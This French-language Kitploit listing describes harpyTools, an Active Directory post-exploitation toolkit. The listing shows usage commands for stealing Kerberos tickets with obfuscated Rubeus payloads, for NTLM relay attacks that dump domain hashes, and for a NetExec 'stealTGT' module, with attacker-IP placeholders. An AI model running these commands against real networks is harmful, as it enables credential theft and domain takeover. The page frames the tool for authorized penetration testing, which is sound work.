Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
harpyTools — Boîte à outils automatisée de post-exploitation Active Directory pour l'extraction de tickets Kerberos, les attaques de relais NTLM, et le mouvement latéral via l'intégration de NetExec, Impacket et Donut. | Kitploit
Outils/GitHubGitHub/jssngc/harpytools
Escalade de PrivilègesGénération de PayloadsExploitationMouvement LatéralShellcodePost-ExploitationTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubjssngc/harpytools

harpyTools

Boîte à outils automatisée de post-exploitation Active Directory pour l'extraction de tickets Kerberos, les attaques de relais NTLM, et le mouvement latéral via l'intégration de NetExec, Impacket et Donut.

192il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Utilitaires d'automatisation de post-exploitation et de relais Active Directory

Ce dépôt contient une collection de scripts d'orchestration Python conçus pour les évaluations de sécurité et les tests d'intrusion dans les environnements Active Directory. Ces outils sont spécifiquement conçus pour des scénarios de post-exploitation où un accès administratif local a déjà été établi sur une station de travail ou un serveur compromis, et l'objectif est d'effectuer un mouvement latéral ou une escalade de privilèges vers le domaine Active Directory plus large.

En automatisant les workflows impliquant des utilitaires de sécurité courants tels que NetExec, Impacket, Donut et BloodyAD, ces scripts simplifient des processus complexes en plusieurs étapes en opérations reproductibles et exécutables en une seule commande.

Prérequis

Les scripts nécessitent que les outils suivants soient installés sur le système hôte et disponibles dans le PATH du système :

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)
  • Donut (générateur de shellcode)
  • Myph (compilateur/obfusqueur binaire)
  • BloodyAD (outil d'administration Active Directory)
  • Utilitaires Linux standards : awk, base64

Dépendances Python optionnelles

Pour un formatage amélioré de la sortie console, installez les paquets suivants :

root@kitploit:~
pip install colorama rich

Présentation des composants

1. Orchestrateur d'extraction de TGT (harpyTGT.py)

Ce script automatise l'extraction d'un Ticket Granting Ticket (TGT) Kerberos à partir d'une session Windows connectée et le convertit au format ccache compatible Linux.

  • Scénario : Une fois l'accès administrateur local obtenu sur une machine, cet outil permet aux opérateurs de récolter les tickets Kerberos des utilisateurs du domaine actifs sur cet hôte, permettant un mouvement latéral sans connaître leurs mots de passe en clair.
  • Mécanisme : Génère une charge utile de shellcode Rubeus.exe via Donut, applique une obfuscation avec Myph, et exécute le binaire résultant sur l'hôte cible en utilisant soit des tâches planifiées (schtask_as) soit mmcexec.

Exécution standard (l'utilisateur cible dispose de privilèges administratifs) :

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>

Exécution alternative (l'utilisateur cible ne dispose pas de privilèges administratifs) :

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

2. Automatisation du relais NTLM (harpyRelay.py)

Ce script coordonne des attaques de relais NTLM ciblant des politiques de signature SMB ou LDAP mal configurées sur les contrôleurs de domaine pour réaliser une escalade de privilèges à l'échelle du domaine ou effectuer un dump de la base de données NTDS (DCSync).

  • Scénario : En utilisant les privilèges d'administrateur local existants sur un hôte compromis, le script force un processus à hauts privilèges (comme une session d'administrateur de domaine) à s'authentifier vers l'attaquant, relayant ces identifiants au contrôleur de domaine pour compromettre l'ensemble du domaine via LDAP/LDAPS.
  • Mécanisme : Lance un écouteur ntlmrelayx, déclenche une demande d'authentification depuis le client compromis via NetExec, surveille la sortie pour une exploitation réussie et dump les hashs du domaine. L'outil contient des routines de nettoyage automatisées pour minimiser l'empreinte sur le domaine cible.

Flux LDAPS (standard) :

root@kitploit:~
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>

Flux LDAP (flux alternatif lorsque LDAPS n'est pas disponible) :

root@kitploit:~
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

3. Module NetExec : stealTGT

Un module personnalisé pour NetExec (nxc) conçu pour extraire le Ticket Granting Ticket (TGT) Kerberos d'un utilisateur spécifique connecté sur la machine cible.

Le module interagit via mmcexec en tant que SYSTEM, automatisant la génération d'une charge utile furtive (encapsulant Rubeus avec Donut et Myph), l'exécutant en mémoire, capturant la sortie du ticket en Base64, et le convertissant de manière transparente en fichier .ccache prêt à être utilisé sous Linux.

Prérequis sur l'hôte attaquant (Kali Linux)

Le module vérifie automatiquement que les utilitaires suivants sont installés et disponibles dans votre $PATH :

  • donut
  • myph
  • impacket-ticketConverter

Installation du module

Pour charger le module externe dans NetExec, copiez le script stealTGT.py dans votre répertoire local de modules NetExec :

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

Utilisation et syntaxe

root@kitploit:~
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe

Options du module (-o) :

  • USER : Le nom d'utilisateur de la session actuellement connectée à partir de laquelle vous souhaitez extraire le TGT (par exemple, jdoe).
  • RUBEUS : Le chemin local sur votre machine attaquante où se trouve le binaire légitime Rubeus.exe.

Fonctionnalités opérationnelles

  • Nettoyage automatisé de l'environnement : L'utilitaire de relais suit les comptes éphémères créés lors de l'exécution et tente automatiquement de les supprimer via bloodyad ou netexec une fois les opérations terminées.
  • Gestion des environnements non-TLS : Inclut des bascules explicites pour les environnements où les contrôleurs de domaine ne prennent pas en charge LDAP sur TLS (LDAPS).

Avertissement

AVERTISSEMENT CRITIQUE : Ce dépôt est destiné strictement à des fins d'audit de sécurité autorisé, de recherche de vulnérabilités et d'éducation. L'exécution de ces outils contre une infrastructure de production sans autorisation préalable explicite et écrite des propriétaires du système est strictement interdite. L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages collatéraux ou de conséquences juridiques résultant du déploiement de ce logiciel.

Télécharger l’outil